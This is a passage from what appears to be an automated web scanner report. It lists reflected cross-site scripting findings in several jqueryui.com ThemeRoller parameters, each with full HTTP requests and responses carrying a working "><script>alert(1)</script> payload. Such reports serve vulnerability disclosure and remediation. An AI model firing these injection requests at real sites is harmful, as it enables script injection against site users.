aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px8f4c6"><script>alert(1)</script>26630e994c5&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.127. http://jqueryui.com/themeroller/ [opacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b37"><script>alert(1)</script>02d95f1f6f4 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30d0b37"><script>alert(1)</script>02d95f1f6f4&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30d0b37"><script>alert(1)</script>02d95f1f6f4&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

1.128. http://jqueryui.com/themeroller/ [opacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa92d"><script>alert(1)</script>b767f439082 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30fa92d"><script>alert(1)</script>b767f439082&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30fa92d"><script>alert(1)</script>b767f439082&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.129. http://jqueryui.com/themeroller/ [thicknessShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dee4"><script>alert(1)</script>e5fddab94a7 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px7dee4"><script>alert(1)</script>e5fddab94a7&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px7dee4"><script>alert(1)</script>e5fddab94a7&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.130. http://jqueryui.com/themeroller/_rollyourown.php [bgColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae4d"><script>alert(1)</script>8380b7870fe was submitted in the bgColorActive parameter. This input was echoed as cae4d\\\"><script>alert(1)</script>8380b7870fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffffcae4d"><script>alert(1)</script>8380b7870fe&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorActive" id="bgColorActive" class="hex" value="ffffffcae4d\\\"><script>alert(1)</script>8380b7870fe" />
...[SNIP]...

1.131. http://jqueryui.com/themeroller/_rollyourown.php [bgColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b331"><script>alert(1)</script>9ad54eb0294 was submitted in the bgColorContent parameter. This input was echoed as 1b331\\\"><script>alert(1)</script>9ad54eb0294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd1b331"><script>alert(1)</script>9ad54eb0294&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorContent" id="bgColorContent" class="hex" value="feeebd1b331\\\"><script>alert(1)</script>9ad54eb0294" />
...[SNIP]...

1.132. http://jqueryui.com/themeroller/_rollyourown.php [bgColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b5ef"><script>alert(1)</script>005c2396836 was submitted in the bgColorDefault parameter. This input was echoed as 3b5ef\\\"><script>alert(1)</script>005c2396836 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f3b5ef"><script>alert(1)</script>005c2396836&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgColorDefault" id="bgColorDefault" class="hex" value="fece2f3b5ef\\\"><script>alert(1)</script>005c2396836" />
...[SNIP]...

1.133. http://jqueryui.com/themeroller/_rollyourown.php [bgColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 744d6"><script>alert(1)</script>05da56c372e was submitted in the bgColorError parameter. This input was echoed as 744d6\\\"><script>alert(1)</script>05da56c372e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17744d6"><script>alert(1)</script>05da56c372e&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


